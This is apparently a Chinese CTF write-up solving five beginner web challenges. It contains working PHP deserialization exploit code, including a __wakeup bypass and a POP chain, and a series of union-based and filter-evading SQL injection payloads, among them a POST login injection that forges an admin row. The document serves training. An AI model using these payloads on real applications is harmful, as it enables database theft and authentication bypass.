[SWPUCTF 2021 新生赛]ez_unserialize
这道题目考察php反序列化的知识点
打开题目,发现没有提示,我们试着用御剑扫描目录文件,发现存在robots.txt的文件
接着访问这个文件,发现是一段php反序列化代码,我们需要进行序列化的转换
简单的构造exp代码如下,在末尾那里
<?phperror_reporting(0);
show_source("cl45s.php");class wllm{public $admin;public $passwd;public function __construct(){$this->admin ="user";$this->passwd = "123456";}public function __destruct(){if($this->admin === "admin" && $this->passwd === "ctf"){include("flag.php");echo $flag;}else{echo $this->admin;echo $this->passwd;echo "Just a bit more!";}}
}
$a=new wllm();
$a->admin = "admin";
$a->passwd = "ctf";
$s=serialize($a);
echo $s;
?>运行即可得到
O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
我们再进行paylaod,即可得到flag
?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
[SWPUCTF 2021 新生赛]no_wakeup
这道题目考察php反序列化的知识点以及__wakeup函数的绕过
按照提示点击即可获得下面php代码,同样也是要将代码进行序列化转换,但是这道题目出现了__wakeup函数,我们需要进行绕过
我们只需要像上面题目构造exp即可,在末尾那里
<?phpheader("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");class HaHaHa{public $admin;public $passwd;public function __construct(){$this->admin ="user";$this->passwd = "123456";}public function __wakeup(){$this->passwd = sha1($this->passwd);}public function __destruct(){if($this->admin === "admin" && $this->passwd === "wllm"){include("flag.php");echo $flag;}else{echo $this->passwd;echo "No wake up";}}}// $Letmeseesee = $_GET['p'];
// unserialize($Letmeseesee);
$a = new HaHaHa();
$a->admin = admin;
$a->passwd = wllm;
echo serialize($a)?>
构造完运行可以得到如下
O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
但是呢,我们如果直接对此进行payload是不可以的,因为还存在着wakeup函数,绕过它非常简单,我们只需要将属性的个数值修改即可,2--->>>3/4/5等等
构造payload如下
?p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
[SWPUCTF 2021 新生赛]pop
这道题目依旧考察php反序列化的知识点,但这道题目中出现了toString的魔术引号,我们需要知道它的用法
也就是说我们要了解清楚代码的运行顺序 ,创建输出对象后就会自动调用toString方法
首先观察一下整段代码,再结合上面总结的魔术方法分析一下,w44m类里面的Getflag函数可以用来读取flag,因此就将它作为这条链子的尾部。
再想一下如何去调用这个函数,看下面这段代码。这段代码中,$this->w00m->{$this->w22m}();会调用函数,所以只需要给$w00m赋一个w44m类,然后再给w22m赋一个Getflag就能成功调用该函数。
再考虑一下如何调用这个w33m类呢??上面写过__toString()这个方法会在一个对象被当作字符串时被调用,于是我们就能看到下面w22m这个类里面的echo函数。我们只要给w00m赋一个w33m类,就能调用。
到了这里,析构函数__destruct,会在对象被销毁时调用,所以我们已经摸到这条链子的头了,捋一下这条链子。
w22m::__destruct()->w33m::__toString()->w44m::Getflag()
然后我们构造一下exp代码
这里注意,因为admin和passwd是私有类和被保护的类,所以没办法在该类的外部赋值或引用,所以要在类中提前赋值
<?phperror_reporting(0);
show_source("index.php");class w44m{private $admin = 'w44m';protected $passwd = '08067';}class w22m{public $w00m;}class w33m{public $w00m;public $w22m;}// $w00m = $_GET['w00m'];
// unserialize($w00m);
$a=new w22m;
$a->w00m=new w33m;
$a->w00m->w00m=new w44m;
$a->w00m->w22m='Getflag';
echo urlencode(serialize($a));?>
运行成功之后可以得到exp
O%3A4%3A"w22m"%3A1%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w33m"%3A2%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w44m"%3A2%3A%7Bs%3A11%3A"%00w44m%00admin"%3Bs%3A4%3A"w44m"%3Bs%3A9%3A"%00%2A%00passwd"%3Bs%3A5%3A"08067"%3B%7Ds%3A4%3A"w22m"%3Bs%3A7%3A"Getflag"%3B%7D%7D
接着构造payload如下:
?w00m=O%3A4%3A"w22m"%3A1%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w33m"%3A2%3A%7Bs%3A4%3A"w00m"%3BO%3A4%3A"w44m"%3A2%3A%7Bs%3A11%3A"%00w44m%00admin"%3Bs%3A4%3A"w44m"%3Bs%3A9%3A"%00%2A%00passwd"%3Bs%3A5%3A"08067"%3B%7Ds%3A4%3A"w22m"%3Bs%3A7%3A"Getflag"%3B%7D%7D
[SWPUCTF 2021 新生赛]easy_sql
这道题目考察sql注入中的联合注入
首先题目地址给出提示参数是wllm,尝试用数字型注入,发现没有正常回显,用单引号注入提示报错语句,从这里可以得知这道题目是字符型的单引号注入,接着用order by判断字段数
?wllm=1' order by 3--+ //当数字为4时,出现报错,可以得知为3个字段数
?wllm=-1' union select 1,2,3--+ //判断回显点,题目出现2和3的提示,说明从2和3中出现回显点
?wllm=-1' union select 1,2,database()--+ //爆出数据库为test_db
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+ //爆出表名test_tb和users
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='users'--+ //从users表中爆出字段名id,username,password,没有获得我们想要的flag,换张表试试
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='test_tb'--+ //从test_tb表中获取到flag字段
?wllm=-1' union select 1,2,group_concat(flag) from test_tb--+ //获取flag字段内容
[SWPUCTF 2021 新生赛]sql
这道题目考察的知识点是sql注入的绕过,空格绕过/**/,注释符绕过%23,等于号=的绕过like,and的绕过,截取函数substr的绕过mid
首先尝试数字型注入,发现没有出现报错界面,试试字符单引号型,发现出现报错语句,此时我们的注释符要替换成url编码形式绕过,以及空格的绕过
?wllm=1'/**/order/**/by/**/3%23 //当数字出现4时报错,说明字段数为3
?wllm=-1'union/**/select/**/1,2,3%23 //题目出现2和3的提示,说明在2和3中出现回显点
?wllm=-1'union/**/select/**/1,2,group_concat(database())%23 //爆出库名test_db
?wllm=-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like("test_db")%23 //出现表名LTLT_flag和users,猜测flag在LTLT_flag表中
?wllm=-1'union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like("LTLT_flag")%23
//爆出字段名id和flag,这里绕过了and,因此只从表中获取到字段名
?wllm=-1'union/**/select/**/1,2,group_concat(flag)/**/from/**/LTLT_flag%23 //这里只能获取到flag的一部分NSSCTF{6bef6596-477a,此时需要用到截取函数截取后面的部分
?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),1,20)/**/from/**/LTLT_flag%23
//可以得到NSSCTF{6bef6596-477a
?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),21,20)/**/from/**/LTLT_flag%23
//可以得到-4360-a43c-252e2f15c
?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),41,20)/**/from/**/LTLT_flag%23
//可以得到70e}
拼接起来可以得到flagNSSCTF{6bef6596-477a-4360-a43c-252e2f15c70e}
[GXYCTF 2019]BabySqli
这道题目考察POST方式的注入,并且带有过滤,我们同样需要进行绕过
先随便输入用户名和密码,配合Burpsuite抓包可以得到如下:得知为POST注入
1.判断注入点:在name上假设为注入点,尝试用数字型,没有显示报错语句,再试试字符单引号型出现报错语句,得知为字符型单引号的注入
2.判断注入点:我们通过抓包可以得到
容易得知上面字符为base32加密,我们先进行解密,再得到base64加密字符,再用base64解密可以得到
select * from user where username = '$name'
可以得知注入点为name,并且为单引号型注入
POST型注入内容:
name=1' group by 3--+&pw=1 //这里可以得到数字4出现报错,得知有3个字段,并且在这里需要绕过order,用group即可绕过
这里用到弱口令猜测的方法 :猜测username为admin,而密码未知,在表中正常存在id,username,passwd这三个字段,但是我们不知道它们正确的顺序,并且passwd是经过md5加密的
接着我们判断admin在表中的哪个位置
name=-1' union select 'admin',2,3--+&pw=1 //假设在第一个字段,出现wrong user!
name=-1' union select 1,'admin',3--+&pw=1 //假设在第二个字段,出现wrong pass!
name=-1' union select 1,2,'admin'--+&pw=1 //假设在第三个字段,出现wrong user!
可以得知admin在第二个字段,第三个字段就为password
接着我们假设password为123,我们需要让123经过md5加密,再进行注入,如下
name=-1'union select 1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123
这里我们注入完成之后,数据库如下
这道题目需要了解数据库的字段格式,相对于我来说,这道题目也是新的解题方式
